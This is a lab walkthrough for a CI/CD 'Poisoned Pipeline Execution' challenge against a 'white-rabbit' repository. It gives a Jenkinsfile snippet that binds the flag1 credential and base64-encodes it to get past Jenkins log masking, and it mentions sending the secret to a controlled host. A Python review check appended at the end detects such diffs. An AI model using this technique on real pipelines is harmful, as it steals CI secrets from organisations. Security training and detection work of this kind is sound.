white-rabbit.md
CICD-SEC-4 Poisoned Pipeline Execution (PPE)

Create a pull request and execute a Direct-PPE attack against the Wonderland/white-rabbit repository to steal the flag1 secret.

The flag is stored in the Jenkins credential store with the Global scope, which makes it accessible to any pipeline on the Jenkins instance.

  1. Clone the Wonderland/white-rabbit repository.

  2. Check out a new branch.

    git checkout -b challenge1

  3. Modify the Jenkinsfile to load flag1 and print it to the Jenkins build console output, which you have access to (encode it so it won’t be masked), or send it to a host you control.

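    stage ('Install_Requirements') {
        steps {
            // Bind the 'flag1' credential to the environment variable flag1
            withCredentials([string(credentialsId: 'flag1', variable: 'flag1')]) {
                sh '''
                    # base64-encode the value so Jenkins does not mask it in the console log
                    echo $flag1 | base64
                '''
            }
        }
    }

  4. Push the changes to the remote branch and create a pull request. A pipeline will be triggered automatically.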

  5. Access the console output of the executed job to get the encoded secret.
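
A reviewer-side check for the change made in step 3, as an added example that is not part of the original write-up: it scans a pull request's unified diff and flags lines added to a Jenkinsfile that bind a credential or read a bound secret variable in a shell step. The function name `review_pipeline_diff`, the `allowed_ids` allowlist and the sample diff are assumptions constructed for illustration.

```python
import re

# Constructed sample (not from the real repository): a PR diff adding step 3's binding.
SAMPLE_DIFF = """\
--- a/Jenkinsfile
+++ b/Jenkinsfile
@@ -10,4 +10,9 @@ pipeline {
         stage ('Install_Requirements') {
             steps {
+                withCredentials([string(credentialsId: 'flag1', variable: 'flag1')]) {
+                    sh '''
+                        echo $flag1 | base64
+                    '''
+                }
                 sh 'pip install -r requirements.txt'
             }
--- a/README.md
+++ b/README.md
@@ -1,1 +1,2 @@
 # white-rabbit
+docs mention credentialsId: 'flag1' only as text
"""

PIPELINE_FILE = re.compile(r"(^|/)Jenkinsfile$")
CRED_ID = re.compile(r"credentialsId\s*:\s*['\"]([^'\"]+)['\"]")
VAR_NAME = re.compile(r"\bvariable\s*:\s*['\"]([^'\"]+)['\"]")
HUNK = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")

def review_pipeline_diff(diff_text, allowed_ids=frozenset()):
    """Return (file, new_line_no, reason) for risky lines a PR adds to a Jenkinsfile."""
    findings, path, lineno, bound = [], None, 0, set()
    for line in diff_text.splitlines():
        if line.startswith("+++ "):             # new-file header: switch file
            path, bound = line[4:].removeprefix("b/"), set()
        elif (m := HUNK.match(line)):           # hunk header: reset line counter
            lineno = int(m.group(1)) - 1
        elif not line.startswith(("-", "\\")):  # context or added line
            lineno += 1
            if line.startswith("+") and path and PIPELINE_FILE.search(path):
                added = line[1:]
                for cred in CRED_ID.findall(added):
                    if cred not in allowed_ids:
                        findings.append((path, lineno, f"binds credential '{cred}'"))
                for var in sorted(bound):       # variables bound on earlier lines
                    if re.search(rf"\$\{{?{re.escape(var)}\b", added):
                        findings.append((path, lineno, f"shell reads secret variable '{var}'"))
                bound.update(VAR_NAME.findall(added))
    return findings
```

Run as a required status check outside the pipeline definition that the pull request can edit, the findings can block the build until a maintainer has reviewed the Jenkinsfile change.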